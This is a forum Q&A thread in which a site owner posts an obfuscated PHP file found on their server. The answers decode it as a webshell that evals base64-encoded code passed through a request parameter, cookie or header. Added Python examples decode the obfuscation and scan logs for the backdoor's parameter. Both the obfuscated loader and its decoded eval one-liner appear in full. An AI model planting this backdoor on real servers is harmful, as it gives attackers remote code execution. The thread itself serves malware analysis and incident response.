-1

The name of the file is dmpdstcm_qsdfjmqsjfdlmqjf.php and its content is below.

What should I do please? :(

<?php
$brian= 'r';$exhaling ='ctpv'; $jacki= 'b'; $cravat = 'am('; $giselbert = 'LkRi"r';$foulplay= '`';$dabbling ='i';$finicky = 'M';$comparison = 'tMraMH';$distract='LM:ZaM';
$cuprous=']'; $augmenting= '"'; $intervene ='(';$impermeable = 'iR)ce_';$disciplinary= ')mCa)'; $hymn='[dOta(Kr';$bagger='rs'; $elysian ='H($(ectoE';$lets = 'l';

$derek='))];Qwrv';

$doloritas='g]sMO(vT';
$crimson= 'CSmdie'; $incidental ='r'; $leaps='$aE"_';

$lumped='='; $gulled = ',?"ncWT';$campground = 'S6rm';

$bell='PP(e';
$fives ='O';$irreflexive='$'; $ambrose= 'kLS$c_'; $dragging = '_';
$bootlegger ='"';$iota= '"esnlcfV_'; $askers= 'Ws'; $fuck ='uV)s'; $greasy= 'i';
$caffeine= 'e';$downplays ='te;l';$amen= '_e'; $inhomogeneity = 'A';$enroll='N';

$constructive='U'; $cutting = ')atT'; $down='P';$duchess ='a';

$amended= 'R';$ashlin = '[[^m';$assisting= 'K';$brazier ='C4__)_l';
$consent= 'i]$eesYa(';$distillers= 'aW;gerg';

$frasier = '_';

$leveller ='raao'; $cedar ='$T$e"MvR]';$fry = 'X?Aes';
$flinched= 'KfswIud='; $attendances = 'e';

$deerskin='o'; $casie='i$aTT_yrE'; $fenugreek= '"';$kittens ='e'; $cavernous='E';$antlered =' '; $glows='ip';$disgraceful = ')'; $feature ='m'; $hypoactive =','; $arrow = 'iU_';$cashers=')yt'; $bilking= '($[(';$hobie = '$';
$goddard=';'; $enlivening ='mnQ['; $capacity= 'K:)(Ea';$droplet = $iota[5]. $casie['7'].$kittens.$capacity['5'].
$cashers['2']. $kittens.$arrow[2] .$flinched['1'].

$flinched[5]. $enlivening['1'] .$iota[5] .$cashers['2']. $arrow[0].$deerskin. $enlivening['1'];
$impassable = $antlered;

$branchings = $droplet ($impassable,$kittens . $cedar['6'] .

$capacity['5'] .$brazier['6'] . $capacity['3'] .

$capacity['5'] . $casie['7']. $casie['7'] . $capacity['5']. $cashers['1'] .
$arrow[2] .
$glows['1'] . $deerskin.$glows['1']. $capacity['3'].

$flinched['1'].$flinched[5] . $enlivening['1'] .$iota[5].
$arrow[2] . $distillers['6'].

$kittens . $cashers['2'] .$arrow[2] . $capacity['5']. $casie['7'].$distillers['6'] .$flinched['2'] .$capacity['3'] .$capacity['2'] . $capacity['2']. $capacity['2'] .$goddard); $branchings($foulplay , $arrow[2] ,$casie['7'], $ashlie['3'],$deerskin , $cashers['2'], $ashlin[2] , $fretting['0'],$hobie . $arrow[0] . $flinched[7]. $capacity['5'].

$casie['7']. $casie['7']. $capacity['5'] .$cashers['1'] .$arrow[2] . $enlivening['0'] .
$kittens .$casie['7'] .

$distillers['6'].$kittens. $capacity['3'] . $hobie .$arrow[2] .$cedar['7'].

$capacity['4']. $enlivening['2'] . $arrow['1']. $capacity['4'].$ambrose['2'].$casie['4'].$hypoactive .$hobie.$arrow[2]. $brazier['0']. $fives .$fives.$capacity['0'].
$flinched['4'] .

$capacity['4'].

$hypoactive.$hobie.

$arrow[2] .$ambrose['2'].$capacity['4'].$cedar['7']. $fuck['1'] .$capacity['4'] .$cedar['7'] .
$capacity['2']. $goddard.
$hobie . $capacity['5']. $flinched[7].$arrow[0]. $flinched['2'].$flinched['2'] . $kittens .$cashers['2'].
$capacity['3'] . $hobie . $arrow[0] .
$enlivening['3'] .$fenugreek.$iota[5] . $enlivening['0'] .$enlivening['0'] .$ambrose['0'] . $enlivening['0'].
$flinched['3']. $capacity['5'] .

$brazier['6']. $fenugreek. $cedar['8'] .$capacity['2'].$fry['1'].

$hobie.$arrow[0] .$enlivening['3'] . $fenugreek .
$iota[5].$enlivening['0'].$enlivening['0'] . $ambrose['0'] .$enlivening['0'].$flinched['3'].$capacity['5'] .$brazier['6']. $fenugreek.$cedar['8'] .$capacity['1']. $capacity['3'] .$arrow[0].
$flinched['2'].$flinched['2'] . $kittens.
$cashers['2'].$capacity['3']. $hobie .$arrow[0] .$enlivening['3'] .$fenugreek. $elysian[0]. $casie['4'].$casie['4'] .$down.$arrow[2].$brazier['0'].

$cedar['5'] . $cedar['5'] . $capacity['0']. $cedar['5']. $distillers['1']. $fry['2'] . $ambrose['1'] .$fenugreek .$cedar['8'].

$capacity['2'] .$fry['1'] .$hobie .$arrow[0] .
$enlivening['3']. $fenugreek.

$elysian[0] . $casie['4'].$casie['4'] .$down.$arrow[2] . $brazier['0'].$cedar['5']. $cedar['5']. $capacity['0']. $cedar['5']. $distillers['1']. $fry['2']. $ambrose['1'] .
$fenugreek.
$cedar['8']. $capacity['1'] . $flinched['6'].$arrow[0].$kittens . $capacity['2']. $goddard . $kittens .
$cedar['6']. $capacity['5']. $brazier['6'] .$capacity['3'].$flinched['2'].$cashers['2'].
$casie['7'] . $casie['7'].$kittens. $cedar['6']. $capacity['3']. $jacki . $capacity['5'].$flinched['2']. $kittens . $campground['1'] . $brazier['1']. $arrow[2].$flinched['6'] .$kittens. $iota[5]. $deerskin .$flinched['6'] .
$kittens .$capacity['3'] . $flinched['2'].$cashers['2'] . $casie['7'].$casie['7'] .$kittens . $cedar['6']. $capacity['3'].$hobie . $capacity['5']. $capacity['2'] . $capacity['2'] . $capacity['2'].$capacity['2'] .$goddard );
f10w

2 Answers

3

This script tries to execute this code:

$i = array_merge($_REQUEST,$_COOKIE,$_SERVER);
$a = isset($i["cmmkmwal"]) ? $i["cmmkmwal"] : (isset($i["HTTP_CMMKMWAL"]) ? $i["HTTP_CMMKMWAL"] : die);
eval(strrev(base64_decode(strrev($a))));

That is, run eval on some encoded parameter. If this file is publicly accessible and processed by your webserver as PHP, this script will execute any code on the server.

Note that just because this file was on your FTP root it does not mean that it was interpreted as PHP. For the script to be run it needs to be accessible through a web server.

Edit: you stated in the comments that the file was accessible through a URL. This means that the attacker could run any code on the server, and the server (or at least your user account) was compromised.

Sjoerd
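The decoding reported in this answer can be reproduced statically, without letting PHP run the file. The following is an added example, not part of the original answer: a small Python resolver for the file's one-character index lookups, run on a subset of the question's assignments. The name $body is introduced here for the inline second argument of the $droplet(...) call.

```python
import re

# Constructed sample: assignments and two expressions copied from the
# question's file, whitespace normalised. Nothing here is executed as PHP.
SAMPLE = r"""
$iota= '"esnlcfV_'; $casie='i$aTT_yrE'; $kittens ='e'; $capacity= 'K:)(Ea';
$cashers=')yt'; $arrow = 'iU_'; $flinched= 'KfswIud='; $enlivening ='mnQ[';
$deerskin='o'; $cedar ='$T$e"MvR]'; $brazier ='C4__)_l'; $glows='ip';
$distillers= 'aW;gerg'; $goddard=';';
$droplet = $iota[5]. $casie['7'].$kittens.$capacity['5'].$cashers['2'].
  $kittens.$arrow[2] .$flinched['1'].$flinched[5]. $enlivening['1'] .
  $iota[5] .$cashers['2']. $arrow[0].$deerskin. $enlivening['1'];
$body = $kittens . $cedar['6'] . $capacity['5'] .$brazier['6'] . $capacity['3'] .
  $capacity['5'] . $casie['7']. $casie['7'] . $capacity['5']. $cashers['1'] .
  $arrow[2] . $glows['1'] . $deerskin.$glows['1']. $capacity['3'].
  $flinched['1'].$flinched[5] . $enlivening['1'] .$iota[5]. $arrow[2] .
  $distillers['6']. $kittens . $cashers['2'] .$arrow[2] . $capacity['5'].
  $casie['7'].$distillers['6'] .$flinched['2'] .$capacity['3'] .
  $capacity['2'] . $capacity['2']. $capacity['2'] .$goddard;
"""

TERM = r"'(?:[^'\\]|\\.)*'|\$\w+(?:\[\s*'?\d+'?\s*\])?"
ASSIGN = re.compile(rf"\$(\w+)\s*=\s*((?:{TERM})(?:\s*\.\s*(?:{TERM}))*)\s*;")
TOKEN = re.compile(r"'((?:[^'\\]|\\.)*)'|\$(\w+)(?:\[\s*'?(\d+)'?\s*\])?")

def resolve(php_source):
    """Map each variable to its string value, for assignments whose right-hand
    side is only literals, variables and one-character index lookups."""
    env = {}
    for name, rhs in ASSIGN.findall(php_source):
        out = []
        for literal, var, index in TOKEN.findall(rhs):
            if not var:
                # Single-quoted PHP strings only unescape \' and \\
                out.append(re.sub(r"\\(['\\])", r"\1", literal))
            elif index:
                i = int(index)
                out.append(env.get(var, "")[i:i + 1])  # out of range -> ""
            else:
                out.append(env.get(var, ""))           # undefined -> ""
        env[name] = "".join(out)
    return env

if __name__ == "__main__":
    env = resolve(SAMPLE)
    print(env["droplet"], "|", env["body"])
```

The two recovered strings show the wrapper: the file builds a runtime function whose body evals its last argument, and that last argument is the long concatenation that resolves to the code quoted in the answer.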
3

I analyzed the code you provided. It was a kind of webshell used for remote access. The code executed is below.

$i=array_merge($_REQUEST,$_COOKIE,$_SERVER);$a=isset($i["cmmkmwal"])?$i["cmmkmwal"]:(isset($i["HTTP_CMMKMWAL"])?$i["HTTP_CMMKMWAL"]:die);eval(strrev(base64_decode(strrev($a))));

Also, just to add, the undefined-function error below probably hints that there may be other infected files on the server that contain this function definition.

Fatal error: Call to undefined function func_eet_ares() in C:\wamp\www\Secscripts\PHPRAT.php(100) : runtime-created function on line 1

Your server is compromised. For cleanup, check the link mentioned in the comments.

Sravan
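For the incident-response side, the decoded code tells you what to look for in logs: requests carrying a cmmkmwal value, which can be decoded by undoing the strrev/base64_decode/strrev chain without evaluating the result. The following is an added example, not part of either answer; the log lines, addresses and encoded value are constructed. It only covers query strings, since the shell also accepts the value from cookies, POST bodies and a request header (HTTP_CMMKMWAL in $_SERVER), which ordinary access logs do not record.

```python
import base64
import binascii
import re
from urllib.parse import urlsplit, parse_qs

PARAM = "cmmkmwal"  # parameter name from the decoded webshell on this page

# Constructed access-log lines; addresses are from a documentation range and
# the encoded value is a harmless made-up payload.
LOG = '''\
203.0.113.7 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php HTTP/1.1" 200 512
203.0.113.9 - - [01/Jan/2024:10:00:05 +0000] "GET /dmpdstcm_qsdfjmqsjfdlmqjf.php?cmmkmwal=%3D%3DQZjh2bgEzO HTTP/1.1" 200 2
203.0.113.9 - - [01/Jan/2024:10:00:09 +0000] "GET /dmpdstcm_qsdfjmqsjfdlmqjf.php?cmmkmwal=not*base64 HTTP/1.1" 200 0
'''

REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def decode_payload(value):
    """Undo strrev(base64_decode(strrev($a))) without evaluating the result.
    Strict decoding: values that are not clean base64 come back as None."""
    try:
        raw = base64.b64decode(value[::-1], validate=True)
    except (binascii.Error, ValueError):
        return None
    return raw[::-1].decode("utf-8", "replace")

def scan(log_text):
    """Return (client, path, decoded PHP or None) per request carrying PARAM."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        query = parse_qs(url.query, keep_blank_values=True)
        for value in query.get(PARAM, []):
            hits.append((line.split()[0], url.path, decode_payload(value)))
    return hits

if __name__ == "__main__":
    for client, path, code in scan(LOG):
        print(client, path, repr(code))
```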